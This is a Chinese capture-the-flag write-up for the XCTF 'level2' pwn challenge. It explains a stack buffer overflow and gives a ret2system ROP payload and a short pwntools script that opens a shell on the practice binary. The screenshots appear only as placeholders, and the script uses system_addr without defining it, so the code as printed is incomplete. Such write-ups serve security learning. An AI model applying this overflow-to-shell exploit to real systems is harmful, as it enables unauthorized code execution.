攻防世界-pwn新手区-level2

在这里插入图片描述
根据题目提示,这个题需要使用rop
运行一下,再file一下
在这里插入图片描述

检查一下保护机制
在这里插入图片描述
丢入ida
在这里插入图片描述
查看vulnerable_function函数,发现有system,证明plt表有这个数据
在这里插入图片描述

可以发现申请0x88的空间,但是却能输入0x100,存在栈溢出
和之前的题目相比,这次没有"/bin/sh"函数
结合题目的提示,我们需要自己构造rop
在这里插入图片描述
buf为0x88,加四个字节到返回地址ret,

利用gdb打印system的地址
在这里插入图片描述
system_addr = 0x8048320
发现有’/bin/sh’
bin_sh_addr = 0x804A024
在这里插入图片描述

所以payload = ‘A’*(0x88+4) + p32(system_addr) + ‘A’*4 +p32(bin_sh_addr)

exp

from pwn import *

bin_sh_addr = 0x804A024
p = process('./level2')
payload = 'A'*(0x88+4) + p32(system_addr) + 'A'*4 +p32(bin_sh_addr)
p.sendline(payload)
p.interactive()

总结:
rop就是利用程序中已有的gadget重新构造成新的代码,然后串联起来,进行利用。

posted @ 2022-04-08 21:23  续梦人  阅读(81)  评论(0)    收藏  举报